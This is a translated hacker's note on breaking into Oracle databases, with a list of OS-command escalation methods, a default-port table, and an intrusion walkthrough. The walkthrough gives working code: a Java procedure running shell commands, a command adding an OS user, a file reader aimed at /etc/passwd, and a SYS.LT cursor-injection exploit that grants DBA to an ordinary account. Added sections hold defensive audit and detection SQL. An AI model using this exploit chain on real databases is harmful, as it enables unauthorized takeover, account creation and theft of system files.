Hacking Oracle notes

###author:hiphop###
###qq:70381908###

Why pay attention to Oracle?
Because Oracle is used by a huge number of enterprises, so there are many targets to choose from for penetration testing.
Many enterprises never update it, so it carries latent risk!
Privilege escalation is very simple, and getting a shell is easy!!

Reading the Black Hat paper got me started researching Oracle,
because it only covers a small part; the real security problems go much wider.
It just seems that few people in China dig into it,
because the environment is not encountered often.
But hey, Oracle is a free download, heh;
you only pay to upgrade.

Connecting to Oracle generally requires the following:
IP
PORT
SID
username/password

The Oracle listener default port is 1521, generally in the 1521-1540 range.
A port scan will not tell you which version is running, although newer nmap releases can recover some of it; sending a TNS packet solves the problem.
A TNS packet reveals the Oracle version.
SID discovery methods:
1. The TNS listener directly
2. Brute force of default SIDs
3. Querying other components that may contain the SID

Username/password cracking

Privilege escalation methods:
Escalation 1: Java function
Win32Exec
Escalation 2: smbrelay
Run OS commands via sql injection in web applications
Run OS commands via create table
Run OS commands via dbms scheduler
Run OS commands via PL/SQL and Extproc
Run OS commands via Java
Run OS commands via Oracle Text
Run OS commands via PL/SQL Native (9i)
Run OS commands via PL/SQL Native (10g / 11g)
Run OS commands via alter system set events
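Every method in the list above depends on a system privilege, a package EXECUTE grant or a Java permission that the database records in its data dictionary, so a defender can enumerate who holds those prerequisites before anyone tries them. The audit script below is an added example written for this note, not code from the original author or from Oracle; it assumes a DBA session on 10g or later, that the DBA_SYS_PRIVS, DBA_TAB_PRIVS and DBA_JAVA_POLICY views are present, and that the excluded account names are the Oracle-maintained schemas of the release in use (adjust them to yours).

```sql
-- Added audit example (not from the original note): list who holds the
-- prerequisites for each OS-command path above. Run as a DBA.
-- ASSUMPTION: the account names excluded below are Oracle-maintained schemas
-- in this database; tune the list to the release in use.

-- 1. System privileges that reach the OS directly or bypass object grants.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('ALTER SYSTEM',            -- alter system set events
                     'CREATE LIBRARY',          -- PL/SQL + extproc
                     'CREATE ANY LIBRARY',
                     'CREATE ANY PROCEDURE',    -- plant code in another schema
                     'EXECUTE ANY PROCEDURE',
                     'CREATE JOB',              -- dbms_scheduler
                     'CREATE ANY JOB',
                     'CREATE EXTERNAL JOB',
                     'CREATE ANY DIRECTORY',    -- UTL_FILE reaches any path
                     'BECOME USER')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
 ORDER BY privilege, grantee;

-- 2. EXECUTE grants on the packages each method drives. A row for PUBLIC means
--    every account, including a low-privileged one, can call the package.
SELECT grantee, owner, table_name AS package_name, grantor
  FROM dba_tab_privs
 WHERE privilege = 'EXECUTE'
   AND table_name IN ('DBMS_JAVA',              -- Java function path
                      'DBMS_SCHEDULER',         -- dbms scheduler path
                      'UTL_FILE',               -- file read/write
                      'UTL_HTTP', 'UTL_TCP',    -- outbound network from the DB
                      'CTX_DDL',                -- Oracle Text path
                      'DBMS_EXPORT_EXTENSION',  -- package named later in this note
                      'LT',                     -- SYS.LT, used by cursor injection
                      'DBMS_SQL')
 ORDER BY table_name, grantee;

-- 3. Java permissions that let a Java stored procedure spawn a process or open
--    arbitrary files. PUBLIC shows up here when it has been granted them.
SELECT kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV', 'JAVA_ADMIN')
 ORDER BY grantee, type_name, name;
```

Run it after every patch cycle and diff the output against the previous run: the rows that matter are new grantees, grants to PUBLIC, and the ADMIN_OPTION / GRANTOR columns, which show who handed the privilege out.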

More will be added!!
This document is only a small note from my research.

Also, a tool worth introducing that can do part of this, written in Python:
download: http://inguma.sourceforge.net/
demo:http://inguma.sourceforge.net/text/inguma_text.html


Note:
Oracle default port list

Service | Port | Product | How to change
--- | --- | --- | ---
Oracle HTTP Server listen port / Oracle HTTP Server port | 80 | Oracle Application Server | Edit httpd.conf and restart OHS
Oracle Internet Directory (non-SSL) | 389 | Oracle Application Server |
Oracle HTTP Server SSL port | 443 | Oracle Application Server | Edit httpd.conf and restart OHS
Oracle Internet Directory (SSL) | 636 | Oracle Application Server |
Oracle Net Listener / Enterprise Manager Repository port | 1521 | Oracle Application Server / Oracle Database | Edit listener.ora and restart listener
Oracle Net Listener | 1526 | Oracle Database | Edit listener.ora and restart listener
Oracle Names | 1575 | Oracle Database | Edit names.ora and restart names server
Oracle Connection Manager (CMAN) | 1630 | Oracle Connection Manager | Edit cman.ora and restart Connection Manager
Oracle JDBC for Rdb Thin Server | 1701 | Oracle Rdb |
Oracle Intelligent Agent | 1748 | Oracle Application Server | snmp_rw.ora
Oracle Intelligent Agent | 1754 | Oracle Application Server | snmp_rw.ora
Oracle Intelligent Agent | 1808 | Oracle Application Server | snmp_rw.ora
Oracle Intelligent Agent | 1809 | Oracle Application Server | snmp_rw.ora
Enterprise Manager Servlet port SSL | 1810 | Oracle Enterprise Manager |
Oracle Connection Manager Admin (CMAN) | 1830 | Oracle Connection Manager (CMAN) | Edit cman.ora and restart Connection Manager
Enterprise Manager Agent port | 1831 | Oracle Enterprise Manager |
Enterprise Manager RMI port | 1850 | Oracle Enterprise Manager |
Oracle XMLDB FTP Port | 2100 | Oracle Database | change dbms_xdb.cfg_update
Oracle GIOP IIOP | 2481 | Oracle Database | Edit listener.ora/init.ora and restart listener/database
Oracle GIOP IIOP for SSL | 2482 | Oracle Database | Edit listener.ora/init.ora and restart listener/database
Oracle OC4J RMI | 3201 | Oracle Application Server |
Oracle OC4J AJP | 3301 | Oracle Application Server |
Enterprise Manager Reporting port | 3339 | Oracle Application Server | Edit oem_webstage/oem.conf and restart OHS
Oracle OC4J IIOP | 3401 | Oracle Application Server |
Oracle OC4J IIOPS1 | 3501 | Oracle Application Server |
Oracle OC4J IIOPS2 | 3601 | Oracle Application Server |
Oracle OC4J JMS | 3701 | Oracle Application Server |
Oracle9iAS Web Cache Admin port | 4000 | Oracle Application Server | Webcache Admin GUI or webcache.xml
Oracle9iAS Web Cache Invalidation port | 4001 | Oracle Application Server | Webcache Admin GUI or webcache.xml
Oracle9iAS Web Cache Statistics port | 4002 | Oracle Application Server | Webcache Admin GUI or webcache.xml
Oracle Internet Directory (SSL) | 4031 | Oracle Application Server |
Oracle Internet Directory (non-SSL) | 4032 | Oracle Application Server |
OracleAS Certificate Authority (OCA) - Server Authentication | 4400 | Oracle Application Server |
OracleAS Certificate Authority (OCA) - Mutual Authentication | 4401 | Oracle Application Server |
Oracle HTTP Server SSL port | 4443 | Oracle Application Server | Edit httpd.conf and restart OHS
Oracle9iAS Web Cache HTTP Listen (SSL) port | 4444 | Oracle Application Server | Webcache Admin GUI or webcache.xml
Oracle TimesTen | 4662 | Oracle TimesTen |
Oracle TimesTen | 4758 | Oracle TimesTen |
Oracle TimesTen | 4759 | Oracle TimesTen |
Oracle TimesTen | 4761 | Oracle TimesTen |
Oracle TimesTen | 4764 | Oracle TimesTen |
Oracle TimesTen | 4766 | Oracle TimesTen |
Oracle TimesTen | 4767 | Oracle TimesTen |
Oracle Enterprise Manager Web Console | 5500 | Oracle Enterprise Manager Web |
iSQLPlus 10g | 5560 | Oracle i*SQLPlus |
iSQLPlus 10g | 5580 | Oracle i*SQLPlus RMI Port |
Oracle Notification Service request port | 6003 | Oracle Application Server |
Oracle Notification Service local port | 6100 | Oracle Application Server |
Oracle Notification Service remote port | 6200 | Oracle Application Server |
Oracle9iAS Clickstream Collector Agent | 6668 | Oracle Application Server |
Java Object Cache port | 7000 | Oracle Application Server |
DCM Java Object Cache port | 7100 | Oracle Application Server |
Oracle HTTP Server Diagnostic Port | 7200 | Oracle Application Server |
Oracle HTTP Server Port Tunneling | 7501 | Oracle Application Server |
Oracle HTTP Server listen port / Oracle HTTP Server port | 7777 | Oracle Application Server | Edit httpd.conf and restart OHS
Oracle9iAS Web Cache HTTP Listen (non-SSL) port | 7779 | Oracle Application Server | Webcache Admin GUI or webcache.xml
Oracle HTTP Server Jserv port | 8007 | Oracle Application Server |
OC4J Forms / Reports Instance | 8888 | Oracle Developer Suite | change dbms_xdb.cfg_update
OC4J Forms / Reports Instance | 8889 | Oracle Developer Suite |
Oracle Forms Server 6 / 6i | 9000 | Oracle Application Server |
Oracle SOAP Server | 9998 | Oracle Application Server |
OS Agent | 14000 | Oracle Application Server |
Oracle TimesTen | 15000 | Oracle TimesTen |
Oracle TimesTen | 15002 | Oracle TimesTen |
Oracle TimesTen | 15004 | Oracle TimesTen |
Log Loader | 44000 | Oracle Enterprise Manager |

This is a note from two years ago. Some content has been cut.

First, I connected to the Oracle server through a certain evil method...... (process omitted)


The connection to the Oracle server came up quickly, at which point I found:
1. The connected account did not have DBA privileges.
2. The SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES vulnerability could not be used to escalate privileges.
3. After running SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual, I found that the Oracle server could not reach the network.


Fortunately,
running
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;

succeeded! This user has the CREATE PROCEDURE privilege.

The immediate idea was to create a Java extension to execute commands:

create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
    public static String runCMD(String args) {
        try {
            BufferedReader myReader = new BufferedReader(
                new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
            String stemp, str = "";
            while ((stemp = myReader.readLine()) != null)
                str += stemp + "\n";   // the original had "/n", a typo for the newline escape
            myReader.close();
            return str;
        } catch (Exception e) {
            return e.toString();
        }
    }
}
/

begin
  dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
end;
/

create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2
as language java name 'LinxUtil.runCMD(java.lang.String) return String';
/

select * from all_objects where object_name like '%LINX%';
grant all on LinxRunCMD to public;
select LinxRunCMD('cmd /c net user linx /add') from dual;


But it got stuck at the very first step: for some unknown reason the server could not create the Java extension!!
Luckily, we still have the UTL packages to use:

create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
  fHandler UTL_FILE.FILE_TYPE;
  buf      varchar2(4000);
  output   varchar2(8000);
begin
  fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
  loop
    begin
      UTL_FILE.GET_LINE(fHandler, buf);
      DBMS_OUTPUT.PUT_LINE('Cursor: ' || buf);
    exception
      when NO_DATA_FOUND then exit;
    end;
    output := output || buf || chr(10);
  end loop;
  UTL_FILE.FCLOSE(fHandler);
  return output;
end;
/


UTL_FILE_DIR first has to be pointed at a directory with:

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';

But running it showed that the account lacked the privilege. The only option was to find a way to escalate.


*************** Cursor injection ***************

Foreign researchers have written N PDFs introducing this technique; I trimmed the code down:


DECLARE
  MYC NUMBER;
BEGIN
  MYC := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(MYC, 'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user''; commit; end;', 0);
  DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
  BEGIN
    SYS.LT.FINDRICSET('.''||dbms_sql.execute(    '||MYC||'      )||'''')--', 'x');
  END;
  raise NO_DATA_FOUND;
EXCEPTION
  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
  WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
END;
/


After running it and reconnecting, the session has DBA privileges. Simple, right......


Now files can be read:


CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual;


The rest is simple, so I will not write it up.
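Every step of the walkthrough above leaves a trace in the data dictionary: a Java source and a wrapper function in an application schema, EXECUTE on that function handed to PUBLIC, a DIRECTORY object pointing at /etc, and a direct grant of DBA to an ordinary account. The script below is an added detection example written for this note, not the original author's code; it assumes a DBA session, traditional (non-unified) auditing with AUDIT_TRAIL set to DB, and that the excluded schema names are the Oracle-maintained ones of the release in use, which is an assumption to tune.

```sql
-- Added detection example (not part of the original note). ASSUMPTIONS: DBA
-- session, traditional auditing (AUDIT_TRAIL=DB), and the schema exclusion list
-- below matches this release's Oracle-maintained accounts.

-- 1. Direct DBA grants. The cursor-injection block ends in GRANT DBA TO <user>;
--    any grantee outside the Oracle-maintained set deserves a look.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM', 'SYSMAN');

-- 2. Java stored code and PL/SQL wrappers in application schemas, newest DDL
--    first (the LinxUtil source and LinxRunCMD function in the walkthrough).
SELECT owner, object_type, object_name, created, last_ddl_time
  FROM dba_objects
 WHERE object_type IN ('JAVA SOURCE', 'JAVA CLASS', 'FUNCTION', 'PROCEDURE')
   AND owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'XDB', 'WMSYS',
                     'ORDSYS', 'OLAPSYS', 'EXFSYS', 'DBSNMP', 'SYSMAN')
 ORDER BY last_ddl_time DESC;

-- 3. Application-schema objects exposed to everyone (GRANT ALL ON LinxRunCMD TO PUBLIC).
SELECT owner, table_name AS object_name, privilege, grantor
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'XDB', 'WMSYS',
                     'ORDSYS', 'OLAPSYS', 'EXFSYS', 'DBSNMP', 'SYSMAN')
 ORDER BY owner, table_name;

-- 4. DIRECTORY objects whose path leaves the Oracle tree (DIRECTORY ... AS '/etc').
--    ASSUMPTION: your ORACLE_BASE contains 'oracle'; adjust the LIKE pattern.
SELECT owner, directory_name, directory_path
  FROM dba_directories
 WHERE LOWER(directory_path) NOT LIKE '%oracle%'
    OR directory_path IN ('/', '/etc', '/tmp')
    OR UPPER(directory_path) LIKE 'C:\WINDOWS%';

-- 5. Record the statements the walkthrough relies on so the next attempt is
--    written to the audit trail rather than discovered after the fact.
AUDIT SYSTEM GRANT;                         -- GRANT/REVOKE of system privileges and roles
AUDIT DIRECTORY;                            -- CREATE/DROP DIRECTORY
AUDIT EXECUTE ON SYS.DBMS_SQL BY ACCESS;    -- package the cursor injection drives
AUDIT EXECUTE ON SYS.DBMS_JAVA BY ACCESS;   -- grant_permission calls

-- 6. Review what was recorded. ACTION_NAME wording varies by release, so the
--    filter is kept loose and keyed on the audited objects as well.
SELECT timestamp, username, os_username, userhost, action_name, owner, obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name LIKE 'GRANT%'
    OR action_name LIKE '%DIRECTORY%'
    OR obj_name IN ('DBMS_SQL', 'DBMS_JAVA')
 ORDER BY timestamp DESC;
```

Queries 1 to 4 are cheap enough to schedule daily and diff; the audit options in step 5 only take effect for sessions started after they are set, and RETURNCODE in step 6 is worth keeping in the output because a non-zero value is a failed attempt, which is exactly the signal a privilege-escalation probe produces before it succeeds.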
